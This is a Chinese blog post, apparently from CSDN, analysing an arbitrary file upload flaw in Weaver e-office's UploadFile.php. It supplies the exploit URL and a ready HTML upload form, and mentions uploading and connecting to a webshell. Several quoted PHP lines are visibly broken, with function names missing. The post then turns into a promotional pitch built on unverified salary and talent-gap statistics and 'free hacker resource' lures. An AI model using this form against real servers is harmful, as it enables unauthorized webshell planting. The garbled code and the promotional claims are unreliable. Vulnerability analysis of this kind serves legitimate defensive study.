前言
X 微 e-office 的那个前台任意文件上传漏洞已经被爆出一段时间了,相关的漏洞利用脚本甚至是漏洞批量利用脚本
也有很多。在这里根据系统代码结合 POC 来分析一下这个漏洞点。
定位漏洞点
根据 poc 中的上传路径可以知道,漏洞点存在于/general/index/UploadFile.php 文件。产生漏洞的代码是下边这一串。
else if ( $uploadType == "eoffice_logo" ){$targetPath = $_SERVER['DOCUMENT_ROOT']."/images/logo/";if ( !file_exists( $targetPath ) ){mkdir( $targetPath, 511, true );}$ext = $_FILES['Filedata']['name']( $_FILES['Filedata']['name'] );$_targetFile = "logo-eoffice".$ext;$targetFile = str_replace( "//", "/", $targetPath )."/".$_targetFile;if ( move_uploaded_file( $tempFile, $targetFile ) ){$query = "SELECT * FROM sys_para WHERE PARA_NAME = 'SYS_LOGO'";$result = exequery( $connection, $query );$row = mysql_fetch_array( $result );$param1 = $param2 = false;if ( !$row ){$query = "INSERT INTO sys_para VALUES('SYS_LOGO','{$_targetFile}')";$param1 = exequery( $connection, $query );}else{$query = "UPDATE sys_para SET PARA_VALUE='{$_targetFile}' WHERE PARA_NAME='SYS_LOGO'";$param1 = exequery( $connection, $query );}$query = "SELECT * FROM sys_para WHERE PARA_NAME = 'SYS_LOGO_TYPE'";$result = exequery( $connection, $query );$row = mysql_fetch_array( $result );if ( !$row ){$query = "INSERT INTO sys_para VALUES('SYS_LOGO_TYPE','2')";$param2 = exequery( $connection, $query );}else{$query = "UPDATE sys_para SET PARA_VALUE='2' WHERE PARA_NAME='SYS_LOGO_TYPE'";$param2 = exequery( $connection, $query );}if ( $param1 && $param2 ){echo $_targetFile;}else{echo 0;}}else{echo 0;}}}}在看到 UploadFile.php 中的内容的时候,发现了很多处类似上面产生漏洞点的代码
但是为什么只有 $uploadType == "eoffice_logo" 这里可以进行任意文件上传呢。
上面三处都使用下边的语句对上传的文件进行了白名单过滤
if ( !in_array( strtolower( $ext ), array( ".jpg", ".jpeg", ".png", ".gif" ) ) )
只有 $uploadType == "eoffice_logo" 这里没有进行白名单过滤,具体是因为什么我还没有深究。
漏洞点代码分析
定位到产生漏洞的代码以后,开始对这段代码进行分析。
定义上传后的文件名和上传路径:
//targetPath 为网站 根目录/images/logo/$targetPath = $_SERVER['DOCUMENT_ROOT']."/images/logo/";//targetPath 如果不存在的话,就会新建目录if ( !file_exists( $targetPath ) ){mkdir( $targetPath, 511, true );}//获取上传文件后缀名,并使用写好的的logo-eoffice与上传文件后缀拼接形成新的文件名,最后进行目录拼接$ext = $_FILES['Filedata']['name']( $_FILES['Filedata']['name'] );$_targetFile = "logo-eoffice".$ext;$targetFile = str_replace( "//", "/", $targetPath )."/".$_targetFile;
复制代码
现在的 targetFile 为 根目录/images/logo/logo-eoffice.上传文件的后缀
接下来会进行文件上传的操作
if ( move_uploaded_file( $tempFile, $targetFile ) )
复制代码
{$query = "SELECT * FROM sys_para WHERE PARA_NAME = 'SYS_LOGO'";$result = exequery( $connection, $query );$row = mysql_fetch_array( $result );$param1 = $param2 = false;if ( !$row ){$query = "INSERT INTO sys_para VALUES('SYS_LOGO','{$_targetFile}')";$param1 = exequery( $connection, $query );}else{$query = "UPDATE sys_para SET PARA_VALUE='{$_targetFile}' WHERE PARA_NAME='SYS_LOGO'";$param1 = exequery( $connection, $query );}$query = "SELECT * FROM sys_para WHERE PARA_NAME = 'SYS_LOGO_TYPE'";$result = exequery( $connection, $query );$row = mysql_fetch_array( $result );if ( !$row ){$query = "INSERT INTO sys_para VALUES('SYS_LOGO_TYPE','2')";$param2 = exequery( $connection, $query );}else{$query = "UPDATE sys_para SET PARA_VALUE='2' WHERE PARA_NAME='SYS_LOGO_TYPE'";$param2 = exequery( $connection, $query );}if ( $param1 && $param2 ){echo $_targetFile;}else{echo 0;}}else{echo 0;}}}}
复制代码
这一大串代码的意思是,上传后会向数据库中进行查询信息
SELECT * FROM sys_para WHERE PARA_NAME = 'SYS_LOGO'
复制代码
如果查不到的话就向数据库中插入数据,如果查询时返回不为空,那么就会将数据进行更新
INSERT INTO sys_para VALUES('SYS_LOGO','{$_targetFile}')UPDATE sys_para SET PARA_VALUE='{$_targetFile}' WHERE PARA_NAME='SYS_LOGO'
复制代码
经过这轮操作,数据库 SYS_LOGO 中已经被插入了数据或者数据已经被更新了,更新后在进行查询操作,并取一行数据作为关联数组。经过这两轮关联,row 的值已经不为空了,也就会看到打印出的_targetFile
if ( $param1 && $param2 ){echo $_targetFile; //$_targetFile = "logo-eoffice".$ext;}
复制代码
到这里似乎没有什么阻碍或者难配置的地方。
分析上传方式
准备构造上传。
$upload = ( );$method = $_GET['m'];$upload->$method( $connection );
复制代码
使用 get 方法传入一个 m,然后upload这个类调用method 方法。这里要想上传文件,也就用到了 uploadPicture 这个方法。
那么 m=uploadPicture
要想利用 eoffice_logo 这个点,还需要传入uploadType,并且令uploadType == "eoffice_logo"
那么最终的漏洞利用的 url 也就有了
/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo
构造上传表单
根据代码构造上传表单
<html><title>泛微e-office文件上传</title><head></head><body><form action="http://ip:port/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo" method="post" enctype="multipart/form-data"><input type="file" name="Filedata"><input type="submit" value="Upload"></body></html>
复制代码
注意一下这里别写错了
<input type="file" name="Filedata">
本地攻击测试
上传时抓包,改包
传马连接
题外话
初入计算机行业的人或者大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。下面我们来看两组数据:
-
2023届全国高校毕业生预计达到1158万人,就业形势严峻;
-
国家网络安全宣传周公布的数据显示,到2027年我国网络安全人员缺口将达327万。
一方面是每年应届毕业生就业形势严峻,一方面是网络安全人才百万缺口。
6月9日,麦可思研究2023年版就业蓝皮书(包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》)正式发布。
2022届大学毕业生月收入较高的前10个专业
本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中,本科计算机类专业起薪与2021届基本持平,高职自动化类月收入增长明显,2022届反超铁道运输类专业(5295元)排在第一位。
具体看专业,2022届本科月收入较高的专业是信息安全(7579元)。对比2018届,电子科学与技术、自动化等与人工智能相关的本科专业表现不俗,较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼,已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。
“没有网络安全就没有国家安全”。当前,网络安全已被提升到国家战略的高度,成为影响国家安全、社会稳定至关重要的因素之一。
网络安全行业特点
1、就业薪资非常高,涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万!
2、人才缺口大,就业机会多
2019年9月18日《中华人民共和国中央人民政府》官方网站发表:我国网络空间安全人才 需求140万人,而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W,现在从事网络安全行业的从业人员只有10W人。
行业发展空间大,岗位非常多
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…
职业增值潜力大
网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争优势。
随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。
从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
如果你对网络安全入门感兴趣,那么你点击这里👉CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
如果你对网络安全感兴趣,学习资源免费分享,保证100%免费!!!(嘿客入门教程)
1.成长路线图&学习规划
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
2.视频教程
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。
3.SRC&黑客文籍
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦!
4.护网行动资料
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
5.黑客必读书单
6.面试题合集
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
更多内容为防止和谐,可以扫描获取~
👉嘿客必备开发工具👈
工欲善其事必先利其器。学习嘿客常用的开发软件都在这里了,给大家节省了很多时间。
这份完整版的网络安全(嘿客)全套学习资料已经上传至CSDN官方,朋友们如果需要点击下方链接也可扫描下方微信二v码获取网络工程师全套资料【保证100%免费】
1425
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
